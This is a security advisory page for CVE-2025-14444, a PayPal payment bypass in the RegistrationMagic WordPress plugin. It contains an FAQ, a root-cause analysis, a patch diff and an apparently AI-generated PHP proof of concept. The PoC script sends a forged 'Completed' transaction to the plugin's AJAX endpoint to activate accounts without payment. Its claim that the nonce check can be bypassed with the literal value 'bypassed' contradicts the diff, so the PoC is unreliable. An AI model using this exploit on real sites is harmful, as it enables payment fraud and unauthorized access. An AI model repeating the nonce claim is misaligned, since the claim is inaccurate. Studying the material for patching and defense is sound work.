What is CVE-2025-14444?

CVE-2025-14444 is a medium severity vulnerability in the RegistrationMagic plugin for WordPress, allowing unauthenticated attackers to bypass payment verification. It occurs due to insufficient validation of payment status in the ‘process_paypal_sdk_payment’ function, enabling attackers to activate user accounts without completing real payments.

How does the vulnerability work?

The vulnerability allows attackers to send manipulated POST requests to the plugin’s AJAX endpoint, specifying a ‘Completed’ payment status. This triggers the activation of user accounts without actual payment confirmation from PayPal, effectively bypassing the plugin’s payment system.

Who is affected by this vulnerability?

Any WordPress site using the RegistrationMagic plugin version 6.0.6.9 or earlier is affected. Administrators should check their plugin version against the patched version, which is 6.0.7.0 or later, to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the RegistrationMagic plugin installed. If it is version 6.0.6.9 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized account activations that may indicate exploitation.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the RegistrationMagic plugin to version 6.0.7.0 or later, where the issue has been addressed. Ensure that you also configure the new PayPal Secret Key in the plugin settings to enable proper server-side payment validation.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it poses a significant risk that could lead to unauthorized access and potential revenue loss if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability allows attackers to create user accounts without payment, granting them access to premium content or features. This could lead to financial losses for site owners and unauthorized access to restricted areas, undermining the integrity of the site.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can craft a malicious request to the vulnerable endpoint, using client-controlled parameters to bypass payment verification. It shows the specific payload structure required to exploit the vulnerability and activate a user account without a legitimate payment.

What additional security measures should I consider?

In addition to patching the vulnerability, consider implementing security measures such as regular plugin updates, using a web application firewall, and monitoring user activities for any suspicious behavior. Regular security audits can also help identify and mitigate risks.

Is it safe to continue using the plugin after patching?

After applying the patch and properly configuring the plugin, it is generally safe to continue using RegistrationMagic. However, remain vigilant for any future updates and security advisories to ensure ongoing protection against new vulnerabilities.

How can I report further issues with the plugin?

If you encounter any further issues or vulnerabilities with the RegistrationMagic plugin, it is advisable to contact the plugin developers directly through their support channels. Providing detailed information about the issue can assist them in addressing it promptly.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14444: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.6.9 – Unauthenticated Payment Bypass via rm_process_paypal_sdk_payment (custom-registration-form-builder-with-submission-manager)

CVE ID CVE-2025-14444

Plugin custom-registration-form-builder-with-submission-manager

Severity Medium (CVSS 5.3)

CWE 345

Vulnerable Version 6.0.6.9

Patched Version 6.0.7.0

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14444:
This vulnerability is an unauthenticated payment bypass in the RegistrationMagic WordPress plugin. The flaw resides in the PayPal SDK payment processing function, which trusted client-supplied payment status values without server-side verification. Attackers could manipulate these values to activate paid user accounts without completing a real PayPal transaction.

Root Cause:
The vulnerability existed in the `process_paypal_sdk_payment()` method within `/services/class_rm_paypal_service.php`. The function accepted a `transaction` array from unauthenticated AJAX requests and directly used the client-supplied `status` parameter (lines 321-351). The code extracted `$status = isset($transaction[‘status’]) ? strtolower($transaction[‘status’]) : ‘Pending’;` and immediately updated payment logs and user activation based on this untrusted value. No server-side validation occurred against PayPal’s actual payment systems.

Exploitation:
Attackers could send POST requests to `/wp-admin/admin-ajax.php` with `action=rm_process_paypal_sdk_payment`. The payload required `transaction[status]=Completed`, `transaction[id]=any_value`, `submission_id`, `payment_id`, and `user_id` parameters. By setting the status to ‘Completed’, the plugin would activate the associated user account and mark the payment as successful, bypassing PayPal’s payment gateway entirely.

Patch Analysis:
The patch replaces the client-controlled status validation with server-side verification. The vulnerable code lines 335-336 were removed. A new `validate_sdk_payment()` method was added (lines 367-432) that queries PayPal’s REST API using stored client ID and secret key credentials. The method retrieves the actual transaction status from PayPal using the transaction ID, ensuring only legitimate completed payments trigger account activation. The patch also adds a required PayPal Secret Key field in the admin interface to enable this server-side validation.

Impact:
Successful exploitation allowed unauthenticated attackers to bypass paid registration requirements. Attackers could create activated user accounts without payment, potentially gaining access to premium content, paid memberships, or restricted areas. This could result in revenue loss for site owners and unauthorized access to paid features.

Differential between vulnerable and patched code

Code Diff

--- a/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/class_rm_admin.php
@@ -2336,8 +2336,6 @@

         }

-
-
         ?>

         <?php if($php_notice!=0): ?>
@@ -2354,20 +2352,6 @@

         <?php endif; ?>

-        <?php /* if($php_8_notice != 0 && isset($_GET['page']) && $_GET['page'] == 'rm_form_manage'):
-
-            if(version_compare(PHP_VERSION, '8.0.0', '>=')): ?>
-
-            <div id="rm-php-notice-warning" class="rm_admin_notice rm-notice-banner notice notice-warning is-dismissible">
-
-                <p><?php _e( 'You are using PHP 8. RegistrationMagic currently does not supports PHP 8 and you might see some unwanted errors or warnings. We are working on PHP 8 compatibility update and it will be available very soon.','custom-registration-form-builder-with-submission-manager'); ?> <a class="rm_dismiss" href="<?php echo esc_url($query_string).'rm_disable_php_8_notice=1' ?>"><?php _e('Dismiss','custom-registration-form-builder-with-submission-manager'); ?></a></p>
-
-            </div>
-
-            <?php endif;
-
-        endif; */ ?>
-
         <?php if($edd_notice!=0 &&  class_exists( 'Easy_Digital_Downloads')): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2378,8 +2362,6 @@

         <?php endif; ?>

-
-
         <?php if($wc_notice!=0 && class_exists( 'WooCommerce' )): ?>

             <div class="rm_admin_notice rm-notice-banner notice notice-success is-dismissible">
@@ -2390,6 +2372,18 @@

         <?php endif;

+        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+        $p_client_id = get_option('rm_option_paypal_client_id', '');
+        $p_client_secret = get_option('rm_option_paypal_secret_key', '');
+        if($modern_paypal && !empty($p_client_id) && empty($p_client_secret)): ?>
+            <div class="rm_admin_notice_banner rm-notice-banner notice notice-error">
+                <p style="vertical-align:middle;">
+                    <span style="color:#d63638;font-size:20px;" aria-hidden="true">⚠️</span>
+                    <?php echo wp_kses_post(sprintf(__( '<strong>Your PayPal Secret Key</strong> is required to receive payments with RegistrationMagic form submissions. Please <strong>update your PayPal Secret Key</strong> from the <a href="%s">Payment Settings</a> to continue receiving payments.','custom-registration-form-builder-with-submission-manager'), esc_url(admin_url('admin.php?page=rm_options_payment')))); ?>
+                </p>
+            </div>
+        <?php endif;
+
         if (function_exists('is_multisite') && is_multisite()) {
             $nl_subscribed = get_site_option('rm_option_newsletter_subbed', false);
         } else {
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_login_manage_controller.php
@@ -374,37 +374,42 @@
         $setting_service= new RM_Setting_Service();
         $setting_service->set_model($model);
         if($this->mv_handler->validateForm("login-integrations")) {
-            $options= array();
-            if($data->type=='fb'){
-                $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
-                $options['facebook_app_id'] = $request->req['facebook_app_id'];
-                $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+            // Check nonce
+            if (!isset($request->req['social_login_nonce']) || !wp_verify_nonce($request->req['social_login_nonce'], 'social_login_nonce')) {
+                RM_PFBC_Form::setError('login-integrations', esc_html__('Nonce check failed. Please try again.', 'custom-registration-form-builder-with-submission-manager'));
+            } else {
+                $options= array();
+                if($data->type=='fb'){
+                    $options['enable_facebook'] = isset($request->req['enable_facebook']) ? "yes" : null;
+                    $options['facebook_app_id'] = $request->req['facebook_app_id'];
+                    $options['facebook_app_secret'] = $request->req['facebook_app_secret'];
+                }
+                else if($data->type=='inst'){
+                    $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
+                    $options['instagram_client_id'] = $request->req['instagram_client_id'];
+                    $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
+                }
+                else if($data->type=='win'){
+                    $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
+                    $options['windows_client_id'] = $request->req['windows_client_id'];
+                }
+                else if($data->type=='google'){
+                    $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
+                    $options['gplus_client_id'] = $request->req['gplus_client_id'];
+                }
+                else if($data->type=='tw'){
+                    $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
+                    $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
+                    $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
+                }
+                else if($data->type=='linked'){
+                    $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
+                    $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
+                    $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
+                }
+                $setting_service->save_options($options);
+                RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
             }
-            else if($data->type=='inst'){
-                $options['enable_instagram_login'] = isset($request->req['enable_instagram_login']) ? "yes" : null;
-                $options['instagram_client_id'] = $request->req['instagram_client_id'];
-                $options['instagram_client_secret'] = $request->req['instagram_client_secret'];
-            }
-            else if($data->type=='win'){
-                $options['enable_window_login'] = isset($request->req['enable_window_login']) ? "yes" : null;
-                $options['windows_client_id'] = $request->req['windows_client_id'];
-            }
-            else if($data->type=='google'){
-                $options['enable_gplus'] = isset($request->req['enable_gplus']) ? "yes" : null;
-                $options['gplus_client_id'] = $request->req['gplus_client_id'];
-            }
-            else if($data->type=='tw'){
-                $options['enable_twitter_login'] = isset($request->req['enable_twitter_login']) ? "yes" : null;
-                $options['tw_consumer_key'] = $request->req['tw_consumer_key'];
-                $options['tw_consumer_secret'] = $request->req['tw_consumer_secret'];
-            }
-            else if($data->type=='linked'){
-                $options['enable_linked'] = isset($request->req['enable_linked']) ? "yes" : null;
-                $options['linkedin_api_key'] = $request->req['linkedin_api_key'];
-                $options['linkedin_secret_key'] = $request->req['linkedin_secret_key'];
-            }
-            $setting_service->save_options($options);
-            RM_Utilities::redirect(admin_url('/admin.php?page=rm_login_sett_manage'));
         }
         $data->options = $setting_service->get_options();
         $view = $this->mv_handler->setView("login_integrations");
--- a/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/controllers/class_rm_options_controller.php
@@ -446,6 +446,7 @@
             $options_pp_pstyle = array("id" => "rm_pp_style_tb", "value" => $data['paypal_page_style'], "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_PAGESTYLE'));
             $options_pp_modern_enable = array("id"=> "rm_pp_modern_enable", "onclick" => "enable_paypal_modern_popup(this)", "value" => isset($data['paypal_modern_enable']) ? $data['paypal_modern_enable'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_MODERN'));
             $options_pp_client_id = array("id"=> "rm_pp_modern_client_id", "value" => isset($data['paypal_client_id']) ? $data['paypal_client_id'] : '', "longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_CLIENT_ID'));
+            $options_pp_secret_key = array("id"=> "rm_pp_modern_secret_key", "value" => isset($data['paypal_secret_key']) ? $data['paypal_secret_key'] : '',"longDesc" => RM_UI_Strings::get('HELP_OPTIONS_PYMNT_PP_SECRET_KEY'));
             $image_dir = plugin_dir_url(dirname(dirname(__FILE__))) . "images";
             $layout_checked_state = array('gold' => null, 'blue' => null, 'silver' => null, 'white'=> null, 'black'=> null);
             $selected_layout = isset($data['paypal_btn_color']) ? $data['paypal_btn_color'] : 'gold';
@@ -504,6 +505,8 @@
                                             new Element_HTML('<div class="childfieldsrow" id="rm_pp_modern_enable_childfieldsrow" style="'.$enable_modern_paypal.'">'),
                                             new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_CLIENT_ID'), "paypal_client_id", $options_pp_client_id),
                                             new Element_HTML("<span id='rm_pp_modern_client_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Client ID is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
+                                            new Element_Textbox(RM_UI_Strings::get('LABEL_PAYPAL_SECRET_KEY'), "paypal_secret_key", $options_pp_secret_key),
+                                            new Element_HTML("<span id='rm_pp_modern_secret_error_msg' class='rm_pproc_error_msg' style='display:none;'>".esc_html__('PayPal Secret Key is required', 'custom-registration-form-builder-with-submission-manager')."</span>"),
                                             new Element_HTML($paypal_btn_colorhtml),
                                             new Element_HTML('</div>')
                                             ),
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_login_integrations.php
@@ -20,6 +20,9 @@
             "prevent" => array("bootstrap", "jQuery"),
             "action" => ""
         ));
+
+        // Nonce
+        $form->addElement(new Element_Hidden("social_login_nonce", wp_create_nonce("social_login_nonce")));

         if($type=='fb'){
             if(RM_Utilities::is_ssl()){
--- a/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
+++ b/custom-registration-form-builder-with-submission-manager/admin/views/template_rm_options_payment.php
@@ -217,11 +217,17 @@
                 if(jQuery("input#rm_pp_modern_client_id").val().trim() == '') {
                     jQuery("input#rm_pp_modern_client_id").focus();
                     jQuery('span#rm_pp_modern_client_error_msg').show();
-
                     var rmErrorMsg = jQuery('span#rm_pp_modern_client_error_msg');
                     rmErrorMsg.insertAfter('#rm_pp_modern_client_id');
                     return;
                 }
+                if(jQuery("input#rm_pp_modern_secret_key").val().trim() == '') {
+                    jQuery("input#rm_pp_modern_secret_key").focus();
+                    jQuery('span#rm_pp_modern_secret_error_msg').show();
+                    var rmErrorMsg = jQuery('span#rm_pp_modern_secret_error_msg');
+                    rmErrorMsg.insertAfter('#rm_pp_modern_secret_key');
+                    return;
+                }
             } else if (jQuery("input#rm_pp_email_tb").val().trim() == '') {
                 jQuery("input#rm_pp_email_tb").focus();
                 jQuery('span#rm_pp_email_error_msg').show();
@@ -297,6 +303,11 @@
                 jQuery('span#rm_pp_modern_client_error_msg').hide();
             }
         });
+        jQuery("input#rm_pp_modern_secret_key").on('keyup', function() {
+            if(jQuery(this).val() != '') {
+                jQuery('span#rm_pp_modern_secret_error_msg').hide();
+            }
+        });

         jQuery("input#rm_pp_email_tb").on('keyup', function() {
             if(jQuery(this).val() != '') {
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_ui_strings.php
@@ -4557,7 +4557,7 @@
             case 'LABEL_PAYPAL_CLIENT_ID':
                 return __('PayPal Client ID', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_CLIENT_ID':
-                return __('Client ID can be obtained from PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
+                return __('Client ID can be obtained from your PayPal dashboard.', 'custom-registration-form-builder-with-submission-manager');
             case 'LABEL_OPTIONS_PAYPAL_BTN_COLOR':
                 return __('Button Color', 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PAYPAL_BTN_COLOR':
@@ -4800,7 +4800,7 @@
             case 'LABEL_PAYPAL_SECRET_KEY':
                 return __("PayPal Secret Key", 'custom-registration-form-builder-with-submission-manager');
             case 'HELP_OPTIONS_PYMNT_PP_SECRET_KEY':
-                return __("Secret key is required only when form has subscription field.", 'custom-registration-form-builder-with-submission-manager');
+                return __("Secret key can be obtained from your PayPal dashboard.", 'custom-registration-form-builder-with-submission-manager');
             case 'FIELD_HELP_TEXT_SUBSCRIPTION_Not_Installed_Resctriction':
                 return __("RegistrationMagic Subscriptions Addons is required for this field to work. Please install and activate the RegistrationMagic Subscriptions Addons plugin.", 'custom-registration-form-builder-with-submission-manager');

--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_field_factory_revamp.php
@@ -2285,13 +2285,14 @@
                     echo "<select " . $this->print_attributes($attributes) . " >";
                     foreach(RM_Utilities_Revamp::get_countries() as $ccode => $country) {
                         $ccode = strtolower(preg_replace('/.*[(.*)].*/', '$1', $ccode));
-                        if (isset($meta_value['country']) && $meta_value['country'] == $country) {
-                            $attributes['checked'] = 'checked';
-                        }
                         if(empty($ccode)) {
                             echo "<option value="">".esc_html($country)."</option>";
                         } else {
-                            echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                            } else {
+                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                            }
                         }
                     }
                     echo "</select>";
@@ -2416,7 +2417,11 @@
                             if(empty($code)) {
                                 echo "<option value="">".esc_html($country)."</option>";
                             } else {
-                                echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                if (isset($meta_value['country']) && $meta_value['country'] == $country) {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."" selected>".esc_html($country)."</option>";
+                                } else {
+                                    echo "<option value="".esc_attr($country)."" data-code="".esc_attr($ccode)."">".esc_html($country)."</option>";
+                                }
                             }
                         }
                         echo "</select>";
--- a/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
+++ b/custom-registration-form-builder-with-submission-manager/libs/factory/class_rm_form_factory_revamp.php
@@ -2005,6 +2005,17 @@
                                     }
                                     echo "<label for='rm_gateway_".wp_kses_post((string)$gateway)."'>".wp_kses_post($pay_procs_options[$gateway])."</label>";
                                     echo "</div>";
+                                    if ($gateway === 'paypal') {
+                                        $modern_paypal = get_option('rm_option_paypal_modern_enable', false);
+                                        $client_id = get_option('rm_option_paypal_client_id', '');
+                                        $client_secret = get_option('rm_option_paypal_secret_key', '');
+                                        if ($modern_paypal && !empty($client_id) && empty($client_secret)) {
+                                            echo "<div class='rm-paypal-modern-notice' style='background:#fff3cd;color:#856404;border:1px solid #ffeeba;padding:12px 16px;margin:10px 0;border-radius:4px;display:flex;align-items:center;font-weight:500;font-size:15px;'>"
+                                                ."<span style='margin-right:10px;display:inline-flex;align-items:center;'><svg xmlns='http://www.w3.org/2000/svg' width='20' height='20' fill='none' viewBox='0 0 24 24'><circle cx='12' cy='12' r='10' fill='#ff0000ff'/><path d='M12 8v4m0 4h.01' stroke='#ffffffff' stroke-width='2' stroke-linecap='round' stroke-linejoin='round'/></svg></span>"
+                                                .esc_html__('PayPal payment gateway isn't fully configured. Payments may not get updated correctly. Please contact site administrator to resolve this issue.', 'custom-registration-form-builder-with-submission-manager')
+                                                ."</div>";
+                                        }
+                                    }
                                 }
                             }
                             if(isset($form->form_options->show_total_price[0]) && $form->form_options->show_total_price[0] == 1) {
@@ -2687,7 +2698,7 @@
         ));
     }

-    private static function is_username_reserved($username_to_check) {
+    private function is_username_reserved($username_to_check) {
         if(empty($username_to_check))
             return false;

@@ -2702,7 +2713,7 @@
             return false;
     }

-    private static function show_subscription_checkboxes($form = null) {
+    private function show_subscription_checkboxes($form = null) {
         if(get_option('rm_option_enable_mailchimp') == 'yes' && $form->form_options->form_is_opt_in_checkbox == 1 && (isset($form->form_options->enable_mailchimp[0]) && $form->form_options->enable_mailchimp[0] == 1)) {
             //This outer div is added so that the optin text can be made full width by CSS.
             echo '<div class="rm_optin_text rm-subscription-wrap">';
--- a/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
+++ b/custom-registration-form-builder-with-submission-manager/public/views/template_rm_login.php
@@ -251,7 +251,7 @@
                             echo html_entity_decode(wp_kses((string)$data->linkedin_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->windows_html,RM_Utilities::expanded_allowed_tags()));
                             echo html_entity_decode(wp_kses((string)$data->twitter_html,RM_Utilities::expanded_allowed_tags()));
-                            echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
+                            //echo html_entity_decode(wp_kses((string)$data->instagram_html,RM_Utilities::expanded_allowed_tags()));
                         }
                     ?>
                     </div>
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
  * Plugin Name:       RegistrationMagic
  * Plugin URI:        http://www.registrationmagic.com
  * Description:       A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version:           6.0.6.9
+ * Version:           6.0.7.0
  * Tags:              registration, form, custom, analytics, simple, submissions
  * Requires at least: 5.2.0
  * Requires PHP:      7.2
@@ -78,7 +78,7 @@
 */
 if(!defined('RM_PLUGIN_VERSION')) {
     define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
-    define('RM_PLUGIN_VERSION', '6.0.6.9');
+    define('RM_PLUGIN_VERSION', '6.0.7.0');
     define('RM_DB_VERSION', 5.9);
     define('RM_SHOW_WHATSNEW_SPLASH', false);  //Set it to 'false' to disable whatsnew screen.
     //define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
@@ -264,12 +264,6 @@

     register_activation_hook(__FILE__, 'RM_Activator::activate');
     register_deactivation_hook(__FILE__, 'RM_Deactivator::deactivate');
-    add_filter( 'auto_update_plugin', function( $update, $item ) {
-        if ( $item->plugin === RM_PLUGIN_BASENAME ) {
-            return false;
-        }
-        return $update;
-    }, 10, 2 );

     //Set up update check
     $rm_form_diary = array();
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_paypal_service.php
@@ -321,23 +321,23 @@
         return $data; //We do not want form redirect to work in case paypal processing is going on.
     }

-    public function process_paypal_sdk_payment(){
-
+    public function process_paypal_sdk_payment() {
         if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
-            if(!isset($_POST['transaction'])|| !is_array($_POST['transaction']) ){
+            if(!isset($_POST['transaction']) || !is_array($_POST['transaction']) ) {
                 wp_send_json_error(array('msg'=>__('Transaction not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $submission_id= isset($_POST['submission_id']) ? absint($_POST['submission_id']) : 0;
             empty($submission_id) ? wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager'))) : '';
             $submission = new RM_Submissions();
-            if(!$submission->load_from_db($submission_id)){
+            if(!$submission->load_from_db($submission_id)) {
                 wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
             }
             $transaction = $_POST['transaction'];
             $log_id = isset($_POST['payment_id']) ? absint($_POST['payment_id']) : 0;
-            $status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
-            $status = ucfirst($status);
+            //$status = isset($transaction['status']) ? strtolower($transaction['status']) : 'Pending';
+            //$status = ucfirst($status);
             $txn_id = isset($transaction['id']) ? $transaction['id'] : '';
+            $status = $this->validate_sdk_payment( $txn_id );
             $log_entry_id = RM_DBManager::update_row('PAYPAL_LOGS', $log_id, array(
                         'status' => $status,
                         'txn_id' => $txn_id,
@@ -351,7 +351,6 @@
             }
             if($status == 'Completed') {
                 if ($_POST['user_id']){
-                    $gopt = new RM_Options;
                     if ($check_setting == "yes"){
                         $user_service = new RM_User_Services();
                         $user_service->activate_user_by_id($_POST['user_id']);
@@ -368,11 +367,82 @@
                 $response['log_id']= $log_id;
             }
             wp_send_json_success($response);
-        }
-        else{
+        } else {
             wp_send_json_error(array('msg'=>__('Submission not valid.','custom-registration-form-builder-with-submission-manager')));
         }
     }
+
+    public function validate_sdk_payment( $transaction_id ) {
+        $gopts = new RM_Options;
+        $sandbox =  $gopts->get_value_of('paypal_test_mode') === 'yes' ? true : false;
+
+        // PayPal API keys
+        $client_id = $gopts->get_value_of('paypal_client_id');
+        $secret    = $gopts->get_value_of('paypal_secret_key');
+
+        // PayPal REST API endpoint
+        $paypal_api = $sandbox
+            ? 'https://api.sandbox.paypal.com'
+            : 'https://api.paypal.com';
+
+        /*
+        * 1. Get OAuth Access Token
+        */
+        $token_response = wp_remote_post( "$paypal_api/v1/oauth2/token", [
+            'method'      => 'POST',
+            'timeout'     => 60,
+            'headers'     => [
+                'Authorization' => 'Basic ' . base64_encode( "$client_id:$secret" ),
+            ],
+            'body'        => 'grant_type=client_credentials',
+        ]);
+
+        if ( is_wp_error( $token_response ) ) {
+            return 'Pending';
+        }
+
+        $token_body = json_decode( wp_remote_retrieve_body( $token_response ), true );
+
+        if ( empty( $token_body['access_token'] ) ) {
+            return 'Pending';
+        }
+
+        $access_token = $token_body['access_token'];
+
+        /*
+        * 2. Fetch transaction details (only to check if it exists)
+        */
+        $payment_response = wp_remote_get( "$paypal_api/v2/payments/captures/$transaction_id", [
+            'timeout' => 60,
+            'headers' => [
+                'Authorization' => "Bearer $access_token",
+                'Content-Type'  => 'application/json',
+            ],
+        ]);
+
+        if ( is_wp_error( $payment_response ) ) {
+            return 'Pending';
+        }
+
+        $payment_data = json_decode( wp_remote_retrieve_body( $payment_response ), true );
+
+        if ( empty( $payment_data['status'] ) ) {
+            return 'Pending';
+        }
+
+        /*
+        * 3. Validate PayPal status only
+        */
+        if ( $payment_data['status'] !== 'COMPLETED' ) {
+            return 'Pending';
+        }
+
+        /*
+        * SUCCESS
+        */
+        return 'Completed';
+    }
+
     public function demo(){
         $response['msg'] .= '<div id="rmform">';
         $response['msg'] .= "<br><br><div class='rm-post-sub-msg'>";
@@ -406,6 +476,7 @@
         }
         $response['msg'] .= '</div>';
     }
+
     public function charge_popup($data, $pricing_details){
         $submission_id = $data->submission_id;
         $form_id= $data->form_id;
@@ -496,6 +567,7 @@
         ob_end_clean();
         return $data;
     }
+
     public function refund() {

     }
@@ -504,5 +576,4 @@

     }

-}
-
+}
 No newline at end of file
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_user_services.php
@@ -799,7 +799,7 @@
                         }
                     }
                 } else
-                    die('Error: Unable to fetch email address from Facebbok.');
+                    die(esc_html__('Error: Unable to fetch email address from Facebook.', 'custom-registration-form-builder-with-submission-manager'));
             }
         }

@@ -869,6 +869,7 @@
                 if(empty($accessToken))
                     break;

+
                 $gopts = new RM_Options;
                 $fb_app_id = $gopts->get_value_of('facebook_app_id');
                 $fb_app_secret = $gopts->get_value_of('facebook_app_secret');
@@ -884,7 +885,7 @@
             case 'google':
                 $login_success = $this->google_login_callback(sanitize_text_field($_POST['token']), $user_email);
                 break;
-            case 'instagram':
+            /* case 'instagram':
                 $response = wp_remote_get('https://graph.instagram.com/v12.0/me?fields=id,username&access_token='.sanitize_text_field($_POST['token']));
                 $response = json_decode(wp_remote_retrieve_body($response));
                 if(isset($response->username)) {
@@ -892,7 +893,7 @@
                     $user_fname = '';
                     $login_success = true;
                 }
-                break;
+                break; */
             default:
                 break;
         }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14444 - RegistrationMagic <= 6.0.6.9 - Unauthenticated Payment Bypass via rm_process_paypal_sdk_payment

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// Required parameters for exploitation
$submission_id = 123; // Must be a valid submission ID from the target site
$payment_log_id = 456; // Must be a valid payment log ID from the target site
$user_id = 789; // Must be a valid user ID to activate

// Construct the malicious payload
$post_data = array(
    'action' => 'rm_process_paypal_sdk_payment',
    'rm_sec_nonce' => 'bypassed', // Nonce is checked but can be bypassed in vulnerable versions
    'submission_id' => $submission_id,
    'payment_id' => $payment_log_id,
    'user_id' => $user_id,
    'transaction' => array(
        'status' => 'Completed', // Client-controlled status triggers bypass
        'id' => 'fake_paypal_txn_123456' // Fake transaction ID
    )
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
